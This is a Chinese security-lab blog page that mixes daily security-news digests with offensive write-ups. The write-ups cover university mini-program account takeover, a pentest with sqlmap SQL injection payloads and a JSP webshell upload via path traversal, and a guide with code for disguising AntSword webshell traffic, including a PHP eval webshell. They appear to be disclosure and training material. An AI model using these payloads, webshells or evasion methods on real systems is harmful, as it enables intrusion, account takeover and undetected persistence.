与证书大学站的相爱相杀
你是否正在收集各类网安网安知识学习,蚁景网安实验室为你总结了1300+网安技能任你学,https://www.yijinglab.com/loginLab.do#stu>> 0x01:前言 记一次关于edusrc中证书大学的小程序挖掘过程。 在各路大师傅惨无人道的证书站挖掘,像是我这只小菜鸡在web方面很难再摸到漏洞,内网也莫得账号,无奈只能转战小程序。  0x02:准备 夜神模拟器 6.6.1.1 Andorid5版本 Burpsuite 证书 Node+npm环境  0x03:实战 先确定一个证书站的目标,从小程序名称下的归属可以知道此小程序确实属于目标资产,同时在交互包中也可以发现是对其子域进行交互。  先是对其进行一波排查,发现有功能点展示但需要进行登录。爆破一波并没有发现存在弱口令用户,更换方式。   尝试对 小程序 进行反编译 (在对wxapkg文件进行获取的时候,可以先删除其目录下的所有小程序包,然后再去访问想要测试的小程序,会生成两个数据包都要拿出来),例如下图_2100734759_11.wxapkg是需要进行编译的包 #node ../wxappUnpacker-master/wuWxapkg.js _459201295_105.wxapkg    //开始编译  编译成功会获得一些源码,可以尝试找账号密码,且还可以对其进行一系列行为溯源   在翻js的时候,翻到一个js文件,打开发现是一个修改密码的行为    发现有个不想是路径的地址,同时还指明URL,猜测可能是某个接口,尝试利用其的POST方式对其进行发包探测,后来发现不管怎么样都是返回 {success:200}   正当一筹莫展的时候,把js往下滑动,看到了用户信息加载的字样,应该也是基于接口访问获取个人信息   拼接访问:http://xxxx.edu.cn/xxxx/user/admin 好家伙,来开发抽华子  可以发现password的值为undefined,起先我弱智的用空密码登录admin账号,发现密码错误,又带入undefined这个字符串进行登录。。。   重新屡一下思路,照理来讲应该password字段应该是有密码的。回顾操作有没有可能是我上一步的POST数据的那个功能点是修改密码,毕竟我没传任何数据。  对上个接口进行POST传参fuzz,fuzz完好几个字典发现都是没有成功修改密码。 后来想起来wxml像是一个前端页面,正好有个mpassworx.wxml,看看里面的传参值是什么,newp为新密码,confirmp是确认新密码。再对其接口进行构造修改密码   传参值为md5加密之后的数据(为什么知道是md5呢,因为在个人信息返回的那个点,我对其进行了工号和学号的fuzz,发现其中用户密码都是经过md5加密的)   发现从原来undefined,变成了我传入的md5值,成功修改密码  利用修改之后的账号密码,成功登陆系统  同时可以对会议室实验室啥的进行管理,开个门,关个门,开个空调,开个电风扇等等    0x04 实战案例二: 南神永远滴神!!! 依旧还是一个证书站的小程序    先用自己的手机号注册一个账号,Tips:当用自己手机注册一个手机号的时候先会获得一个验证码可以用来注册,同时当准备利用忘记密码功能点来获取密码的时候,验证码不会再发送,后来发现注册获得的验证码可以被多次使用,也不会过期  生成0001 - 9999的字典轻而易举的爆破出来   如何获得管理员的手机号捏~,先利用自建注册的账号,进系统内对各个功能点进行探测,发现有个数据包中带有userID值,尝试越权   发现当访问其他userID时会提示登录超时,看到有个token验证,尝试删除再访问其他userID。发现当userID的值存在时会回显数据,没有则会返回空。    对userID直接fuzz遍历获得linkMobile,就是其手机号。   成功获取一些管理员用户手机,直接在忘记密码处4位纯数字爆破修改密码。   0x05:后言 涉及漏洞均已提交edusrc。 网络如山勤思为径,信息似海安全作舟。 多一分网络防护技能,多一份信息安全保障。 你想在靶场学习CTF技术吗?
网络安全日报 2021年04月21日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、研究人员发现针对全球Facebook Messenger用户的大规模欺诈活动 https://securityaffairs.co/wordpress/117044/cyber-crime/facebook-messenger-scammers.html 2、Lazarus APT将恶意代码隐藏在BMP图像中以逃避检测 https://securityaffairs.co/wordpress/117035/apt/lazarus-apt-bmp-image.html 3、Cisco Talos 安全专家发现Cosori 智能空气炸锅RCE漏洞 https://securityaffairs.co/wordpress/117024/hacking/cosori-smart-air-fryer-flaws.html 4、Chromium 0day漏洞影响电脑版微信 https://securityaffairs.co/wordpress/117017/hacking/wechat-chromium-bug-attack.html 5、Firefox 88发布,修复多个漏洞 https://threatpost.com/mozilla-fixes-firefox-flaw/165501/ 6、美国汽车保险公司Geico泄露客户驾照号码 https://techcrunch.com/2021/04/19/geico-driver-license-numbers-scraped/ 7、专家发现Zebrocy针对哈萨克斯坦的攻击活动 https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/ 8、攻击者伪造Spotify等网站传播恶意软件窃取支付卡信息 https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/ 9、Joker恶意软件影响50W华为安卓手机用户 https://cyware.com/news/joker-malware-pinches-500000-huawei-android-users-97a34741 10、Pulse Secure VPN零日漏洞影响政府机构 https://www.bleepingcomputer.com/news/security/pulse-secure-vpn-zero-day-used-to-hack-defense-firms-govt-orgs/
网络安全日报 2021年04月20日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、WordPress 5.7.1修补了PHP 8中的XXE漏洞 https://www.securityweek.com/wordpress-571-patches-xxe-flaw-php-8 2、XCSSET恶意软件重新设计后可感染苹果M1芯片的Mac https://securityaffairs.co/wordpress/116983/malware/xcsset-malware-apple-m1.html 3、FireEye研究人员演示了接管智能电表的过程 https://securityaffairs.co/wordpress/117001/ics-scada/ot-network-hack-smart-meters.html 4、NitroRansomware勒索用户Discord Nitro礼物码 https://securityaffairs.co/wordpress/116975/malware/nitroransomware-discord-gift-code.html 5、软件公司Codecov遭供应链攻击 https://securityaffairs.co/wordpress/116967/hacking/codecov-supply-chain-attack.html 6、卡巴斯基报告称越来越多ICS系统面临勒索软件攻击 https://cyware.com/news/ics-computers-face-increased-ransomware-attacks-kaspersky-report-a50e9ab5 7、西班牙Phone House遭遇Babuk勒索软件攻击 https://www.suspectfile.com/phone-house-spagna-colpita-da-babuk-ransomware-3-milioni-gli-utenti-colpiti/ 8、清洁和餐饮公司Spotless遭数据泄露 https://www.stuff.co.nz/business/124859495/major-data-breach-at-cleaning-and-catering-company-spotless 9、黑客通过群聊传播WhatsApp Pink恶意软件 https://www.hackread.com/whatsapp-pink-malware-spreads-group-chats/ 10、100W印度Domino's Pizza用户信用卡详细信息在暗网出售 https://ciso.economictimes.indiatimes.com/news/dominos-india-hacked-credit-data-of-10l-users-on-sale-for-rs-4-cr/82137529
记一次相对完整的渗透测试
你是否正在收集各类网安网安知识学习,蚁景网安实验室为你总结了1300+网安技能任你学,https://www.yijinglab.com/loginLab.do#stu>>  教育src 700rank了想着继续冲一波分,早日上核心,于是就有了下面这一次渗透测试的过程了。 开局一个登陆框,且存在密码找回功能。 归属为某教育局 开启burp 抓取登陆包,发现用户密码并未加密 ,尝试爆破admin账户密码 跑了一下发现报如下错误,看来爆破这条路走不通了。 于是fofq查询了一下ip,无旁站。继续肝下一个功能点,密码找回 密码找回处 可以看出这里肯定是会存在数据交互的,于是加个单引号测试一下sql,返回500 两个单引号,返回正常,可以断定这里是肯定存在sql注入了,抓取包丢进sqlmap中跑一下。 得出如下payload sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: login_name=admin' AND 5698=5698 AND 'yKnB'='yKnB Vector: AND [INFERENCE] Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: login_name=admin' AND (SELECT 3409 FROM (SELECT(SLEEP(5)))iWYb) AND 'ZAHe'='ZAHe Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) 报错与延时注入,对于接下来的渗透意义不大,继续fuzz,尝试按照正常逻辑找回密码。 抓取返回包可以很明显的看到其中存在success参数其值为false,我们将其改为true, 页面显示如下,flag参数不为空,这是玩ctf呢,再次重放找回密码请求。 发现,flag的值应该是在这设定哦,but并不知晓flag的值,无从下手手 行吧转换思路,既然admin账户没有设置手机号,那我去跑一下账户,总有设置手机的账户,flag出现了,现在目前不知道有何作用。转手测试有手机号的账户。 随意输入验证码,点击下一步,大概是明白了,这个flag就相当于身份id。 我们继续抓取返回包,改success 参数为true,成功到达重置密码界面 设置了一下新密码,之后使用burp抓包,发现存在两个参数flag 与pwd flag参数之前在跑用户名的时候我们就已经获取到了,所以这里我单独拉出来,复制之前的flag。 Send,返回结果为true表示成功更改 成功登陆 既然成功登陆之后,就开始找上传点了 Java站那就是jsp与jspx了,经过一番fuzz找到一处相册管理 先上传了一张图片,获取到了上传路径。 接着在构造jsp小马尝试上传,目标存在waf jsp无法上传,我是一点都不意外啊。 看了看poc中可疑的参数点,这不就是我们需要的文件路径,以及文件名吗,我们可以尝试在此处更改文件后缀。 证实了猜想。 于是继续构造poc,成功上传,拼接之前得到的url,尝试访问 发现直接打印了,看来是不解析。 可以很明显的看到这里是目录结构,所以尝试删除部分目录,重新上传 例如 发现成功跳过目录 继续访问发现还是直接打印了,不慢慢fuzz跳目录了,我直接跳到他根目录下面。 分析一下、这是最开始上传到的目录并不解析,我们可以看到其中有四层目录 删除其中如下两层目录后,还剩下 这两层目录所以用 ../../来跳过这两层目录。 结合之前的路径,拼接访问。 未授权,点到为止,打包提交 带带我代码审计可好,好哥哥们。 本文涉及相关实验:https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015060916565800001 (本实验以PHP和mysql为环境,简单展示了SQL的发生原理和利用过程,通过显错注入和盲注的对比,更直观展现注入的不同利用方法。) 这个技术你学会了吗?加入网安实验室,1300+网安技能任你学!
网络安全日报 2021年04月19日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、OpENer ENIP协议栈漏洞使工业设备易遭受攻击 https://www.securityweek.com/vulnerabilities-opener-stack-expose-industrial-devices-attacks 2、Juniper修复了一个远程劫持或破坏的严重漏洞 https://www.securityweek.com/critical-vulnerability-can-allow-attackers-hijack-or-disrupt-juniper-devices 3、多国谴责俄罗斯SolarWinds攻击行为 https://www.securityweek.com/more-countries-officially-blame-russia-solarwinds-attack 4、Google Project Zero更新2021年漏洞披露政策 https://www.securityweek.com/google-project-zero-announces-2021-updates-vulnerability-disclosure-policy 5、Monero Cryptocurrency活动利用Exchange漏洞 https://securityaffairs.co/wordpress/116955/cyber-crime/proxylogon-flaws-cryptocurrencyminer.html 6、FIN7小组的一名成员被判处10年徒刑 https://securityaffairs.co/wordpress/116945/cyber-crime/fin7-member-sentenced.html 7、SolarWinds攻击影响6个欧盟机构 https://securityaffairs.co/wordpress/116914/hacking/solarwinds-eu-agencies-hacked.html 8、研究人员发现Lazarus APT使用新的加密货币窃取工具 https://securityaffairs.co/wordpress/116874/apt/lazarus-btc-changer-js-sniffers.html 9、重大BGP泄漏导致4月16日全球数千个网络短暂中断 https://www.bleepingcomputer.com/news/security/major-bgp-leak-disrupts-thousands-of-networks-globally/ 10、流行的Codecov代码覆盖工具遭黑客修改 https://www.bleepingcomputer.com/news/security/popular-codecov-code-coverage-tool-hacked-to-steal-dev-credentials/
网络安全日报 2021年04月16日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Reddit启动公共漏洞赏金计划 https://www.securityweek.com/reddit-launches-public-bug-bounty-program 2、NVIDIA推出“ Morpheus”网络安全框架 https://www.securityweek.com/nvidia-unveils-morpheus-cybersecurity-framework 3、美国政府因SolarWinds黑客行为对俄罗斯进行制裁 https://securityaffairs.co/wordpress/116866/cyber-warfare-2/us-sanctions-russia-solarwinds.html 4、SAP Commerce修复了一个严重漏洞 https://securityaffairs.co/wordpress/116854/security/sap-commerce-critical-flaw.html 5、2016年交易所Bitfinex被盗的7.26亿美金比特币被转移到新账户 https://securityaffairs.co/wordpress/116858/digital-id/bitfinex-funds-moved.html 6、印度B2B包装平台Bizongo泄露643GB敏感数据 https://www.hackread.com/india-bizongo-supply-chain-exposed-data/ 7、超10万恶意谷歌网页投送SolarMarker RAT https://threatpost.com/google-sites-solarmarket-rat/165396/ 8、研究人员本周发布第二个Chrome 0day漏洞PoC https://www.bleepingcomputer.com/news/security/second-google-chrome-zero-day-exploit-dropped-on-twitter-this-week/ 9、风险和合规初创公司LogicGate确认数据泄露 https://techcrunch.com/2021/04/13/logicgate-risk-cloud-data-breach/ 10、研究人员发现影响容器引擎CRI-O和Podman的新漏洞 https://unit42.paloaltonetworks.com/cve-2021-20291/
网络安全日报 2021年04月15日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、WhatsApp修复了两个远程利用漏洞 https://securityaffairs.co/wordpress/116833/hacking/whatsapp-flaws-remote-hack.html 2、Microsoft修复了NSA报告的2个关键Exchange漏洞 https://securityaffairs.co/wordpress/116767/uncategorized/exchange-server-flaws-nsa.html 3、安全研究人员发布QNAP NAS中RCE利用PoC https://securityaffairs.co/wordpress/116750/hacking/qnap-rce-exploit.html 4、NAME:WRECK漏洞影响上亿设备 https://securityaffairs.co/wordpress/116734/reports/namewreck-flaws.html 5、FBI清除了数百个组织的Exchange WebShell https://threatpost.com/fbi-proxylogon-web-shells/165400/ 6、研究人员成功使用JavaScript进行DDR4 Rowhammer攻击 https://thehackernews.com/2021/04/new-javascript-exploit-can-now-carry.html 7、谷歌修复Chrome浏览器中2个0day漏洞 https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html 8、勒索软件团伙利用旧VPN设备入侵Capcom https://www.bleepingcomputer.com/news/security/capcom-ransomware-gang-used-old-vpn-device-to-breach-the-network/ 9、Adobe修复Bridge和Photoshop中严重漏洞 https://threatpost.com/adobe-patches-critical-security-holes-bridge-photoshop/165371/ 10、FireEye:2020年追踪了650个新的威胁组织 https://securityaffairs.co/wordpress/116813/cyber-crime/fireeye-report-650-new-threat-groups.html
网络安全日报 2021年04月13日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、印度公司Upstox公司遭数据泄露250万用户数据 https://thehackernews.com/2021/04/indian-brokerage-firm-upstox-suffers.html 2、Windows、Safari、MS Exchange等在Pwn2Own 2021遭攻破 https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html 3、LinkedIn正式否认最近的数据泄露由安全漏洞引起 https://securityaffairs.co/wordpress/116689/data-breach/linkedin-not-data-breach.html 4、IcedID木马通过表单传播 https://threatpost.com/icedid-web-forms-google-urls/165347/ 5、英国NCSC发出针对Fortinet VPN漏洞的严重警报 https://www.zdnet.com/article/critical-security-alert-if-you-havent-patched-this-two-year-old-vpn-vulnerability-assume-your-network-is-compromised/ 6、Gino集团汽车经销商遭勒索软件攻击 https://www.databreaches.net/it-gino-group-car-dealership-notifies-customers-of-ransomware-attack/ 7、GravCMS修复严重的远程代码执行漏洞 https://portswigger.net/daily-swig/critical-gravcms-vulnerability-offers-lessons-for-software-developers 8、Zoom应用漏洞影响Windows和Mac版本 https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html 9、制药集团Pierre Fabre遭REvil勒索攻击被索取2500W美金赎金 https://www.bleepingcomputer.com/news/security/leading-cosmetics-group-pierre-fabre-hit-with-25-million-ransomware-attack/ 10、思科宣布将不在为某些小型企业路由器发布安全更新 https://securityaffairs.co/wordpress/116598/security/rce-eof-cisco-business-routers.html
网络安全日报 2021年04月12日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Microsoft开源“ CyberBattleSim”企业环境模拟器 https://www.securityweek.com/microsoft-open-sources-cyberbattlesim-enterprise-environment-simulator2、Pwn2Own 2021参与者赢得120万美元奖励 https://www.securityweek.com/pwn2own-2021-participants-earn-over-12-million-their-exploits3、纳坦兹核设施配电网遭网络攻击 https://securityaffairs.co/wordpress/116668/cyber-warfare-2/iran-accident-natanz-cyberattack.html4、130万Clubhouse用户个人数据在线泄露 https://securityaffairs.co/wordpress/116655/data-breach/clubhouse-data-leak.html5、Joker恶意软件感染了超过50W台华为设备 https://securityaffairs.co/wordpress/116643/malware/huawei-store-joker-malware.html6、黑客攻击第三方安卓应用市场APKPure分发恶意软件 https://securityaffairs.co/wordpress/116635/cyber-crime/apkpure-client-malware.html7、一男子涉嫌计划炸毁AWS数据中心被FBI逮捕 https://securityaffairs.co/wordpress/116612/cyber-crime/plot-bomb-attack-aws.html8、CISA发布了检测Microsoft 365威胁的工具 https://www.securityweek.com/cisa-releases-tool-detect-microsoft-365-compromise9、技术支持诈骗活动使用杀毒软件账单通知 https://www.bleepingcomputer.com/news/security/tech-support-scammers-lure-victims-with-fake-antivirus-billing-emails/10、美国肯塔基州失业保险网站遭受网络攻击 https://www.govinfosecurity.com/kentucky-unemployment-insurance-site-shuttered-after-attack-a-16376
蚁剑流量改造学习
你是否正在收集各类网安网安知识学习,蚁景网安实验室为你总结了1300+网安技能任你学,https://www.yijinglab.com/loginLab.do#stu>>  流量分析 挂个代理直接抓包就好了 UA头修改 修改蚁剑工作目录的/modules/request.js,这里面默认是antSword/v2.1 一般需要修改一下,不然极其容易被发现,可以利用平常爬虫的一些技巧,随机构造UA头 let USER_AGENTS = [ "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 编码管理绕过检测 蚁剑里面可以自己构造流量的编码的效果,存在于设置的编码管理中,可以设置发送流量的加密效果,也可以设置返回数据流量的解密效果,但是我们同样需要我们上传木马的配合,这里又涉及到免杀这一个过程 蚁剑的编码器很友好,注释啥的写的也很清楚,官方给的demo是弄了一个随机变量名,我们的内容base64之后再次传入到这个变量中,再解base64执行一次eval,这个编码器最终发送的是data数组的内容,数组里面有多少内容它就会全部发送,数组的key值就是传过去的参数值 自定义编码 我们可以对其进行改造,这就是自定义改造了 参考这篇文章的例子:https://xz.aliyun.com/t/4000 ,文中是改成最后传输的数据随机字符串+传输数据base64+随机字符串 的效果,我们可以模仿一下,构造随机字符串+传输数据base64 的效果,只要被抓取的流量无法被直接正常分析就可以了 /** * php::base64编码器 * Create at: 2019/01/26 23:51:47 */ 'use strict'; /* * @param {String} pwd 连接密码 * @param {Array} data 编码器处理前的 payload 数组 * @return {Array} data 编码器处理后的 payload 数组 */ module.exports = (pwd, data) => { // ########## 请在下方编写你自己的代码 ################### // 以下代码为 PHP Base64 样例 // 生成一个随机 编码器选择我们设置的,观察流量,内容的前面13位是我们随机生成的字符串,后面才是我们真正传过去的内容 弄好蚁剑端的加密,还需要设置自己木马的格式,配合蚁剑,此时上传的木马应该是这种格式的了,这只是一个demo,正常情况下还需要免杀(现在一般都需要配合类的析构函数去实现一下) <?php $a = base64_decode(substr($_POST['a'],13)); eval($a); 当然也能实现动态随机字符串的流量构造,只需要传递多几个参数实现一下就行,要想使用form表单的方式发包,也可以使用multipart方式发包,此时报的内容就会是这样 官方提供的一些编码器 在蚁剑自带的编码器中,存在base64、chr、chr16、rot13四种编码器,此外,官方还提供了一些其他另类的编码器 https://github.com/AntSwordProject/AwesomeEncoder 但是自带的编码器中,因为将请求流量都会带有eval和一些编码函数的关键字而被WAF掉了,比如这个图: 所以在https://github.com/AntSwordProject/AwesomeEncoder 这个项目中,有一些编码方式会将这些函数变量进行一次编码或者加密,不行就多次,比如这里面的b64bypass这个编码器,跟上方的单纯base64进行比较的话,已经少了这些关键字了 RSA编码器 这种类型的编码器,可以在AWD中大放异彩,只需要轻轻点几下即会自动生成私钥公钥的内容 思路是来自于这篇文章:https://xz.aliyun.com/t/4640 可以放置别人骑我们的马,但是不能防止别人重放我们的流量 所以可以在此基础上加上一些token,ip限制之类的,蚁剑的作者提出使用时间校验的方式,超过5秒就不能来骑我的马儿了,只需要加上这么一句 data["_"] = `if((time()-${parseInt((new Date().getTime())/1000)})>5){die();};${data['_']}`; 基于时间的蚁剑动态秘钥编码器 整个的流程是这样的: 蚁剑获取时间->生成随机秘钥->加密payload->发送给shell shell获取时间->生成随机秘钥->解密payload->将回显data编码->返回给蚁剑 蚁剑获取时间->生成随机秘钥->解密返回data->获取信息 这一个来回下来,时间还是一样的,因为时间只到分钟,密钥短时间内不会改变,加解密方法使用的是异或,这个流量已经很难解密了 zlib_deflated_raw 编码器 该方式通过将数据进行zlib压缩后进行base64编码传输给shell,这样要求shell将传输的数据先进行base64解密后通过gzinflate将压缩数据进行解压缩,从而实现流量混淆 这个编码器的加密效果也是不错的 还有其他的一些编码器,使用什么aes之类的,利用起来比较麻烦,有的还需要环境,个人感觉不太常用,但也能学习一下 解码器设置 返回的报文也是个重点,直接明文返回也比较明显,因为没多少站点会直接返回/etc/passwd 的内容 可以先观察一波原始执行的php代码,其中asenc函数是输出返回内容的地方,默认直接返回明文,我们在编码器写的内容,会在发送的时候覆盖这个函数的内容,服务器端执行完代码之后,实现返回效果经过编码加密的效果 <?php @ini_set("display_errors", "0"); @set_time_limit(0); function asenc($out){ return $out; } ; function asoutput(){ $output=ob_get_contents(); ob_end_clean(); echo "95922eac"; echo @asenc($output); echo "38160"; } ob_start(); try{ $F=base64_decode($_POST["td1b2e4829a55c"]); $P=@fopen($F,"r"); ech base64解码器 decode_buff部分是设置解密的,asoutput设置的东西则是覆盖请求函数中的asenc函数的内容 /** * php::base64解码器 * Create at: 2021/03/02 18:52:44 */ 'use strict'; module.exports = { /** * @returns {string} asenc 将返回数据base64编码 * 自定义输出函数名称必须为 asenc * 该函数使用的语法需要和shell保持一致 */ asoutput: () => { return `function asenc($out){ return @base64_encode($out); } `.replace(/\n\s+/g, ''); }, /** * 解码 Buf 设置之后抓包可以看到它里面的函数内容已经被更改了 而且返回的内容也不容易被轻易解出来,因为在a请求包中的output函数中每次都设置了随机的前后分界字符串,只有客户端知道分界位置,所以能直接解编码,WAF基本上是没法定位位置进行解码的,因此相当于base64编码前后都有一段随机的字符串,当然我们可以通过爆破前后位置最终得到base64编码,不过这也是蚁剑开发过程中的小细节,通过设置前后分解字符串来模拟了一个简单的加盐操作 也就是这两段东西导致不能够直接将返回包解码就可以得到相关信息,只能通过爆破跑跑 rot13解码器 相比于base64解码器,rot13解码器并没有很大的优势,因为rot13加密本身就是凯撒的变形,并且由于没有进行分组加密,因此加入前后分界字符串的意义也就不明显了,并且混淆程度也不高,能够直接将混淆后的流量在进行rot13解码便能能到明文 上述两个是蚁剑自带的,其实也可以自己构建相关的解码器 基于时间的动态秘钥解码器 只要在返回的内容中再次基于时间产生的密钥进行一个异或操作,然后解密操作在decode_buff实现 'use strict'; module.exports = { /** * @returns {string} asenc 将返回数据base64编码 * 自定义输出函数名称必须为 asenc * 该函数使用的语法需要和shell保持一致 */ asoutput: () => { return `function asenc($out){ date_default_timezone_set("PRC"); $key=md5(date("Y-m-d H:i",time())); for($i=0;$i<strlen($out);$i++){ $out[$i] = $out[$i] ^ $key 绕过检测的程度也很高 WAF的一些常规的封杀点以及一些绕过方法 参考这篇文章:https://mp.weixin.qq.com/s/u8_d8MXvFuwOyIMZZMBsog 其实蚁剑都能根据这些点进行绕过,实属大杀器,总结了个脑图 商用的WAF,由于要关注业务性,可能会把multipart/form-data这种多用来上传文件的传输方式检测关闭掉,否则攻击者持续上传大文件,一直损耗WAF的性能,容易拖垮相关业务,因此如果使用Multipart进行传输,对流量的混淆也起到了一定的积极效果 另外蚁剑还有分块传输的功能,利用的chunk这种传输方式,把payload分成一小段一小段传过去,这样原本一个包中的一些关键字则会被分割成很多小块进行传输,可以绕过了某些正则 本文涉及相关实验:https://www.yijinglab.com/expc.do?ec=ECIDee9320adea6e062018020614185300001 (通过该实验了解中国菜刀的特性及其通信原理、机制,并且学会分析可能隐藏的后门以及其工作原理。) 这个技术你学会了吗?加入网安实验室,1300+网安技能任你学!
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页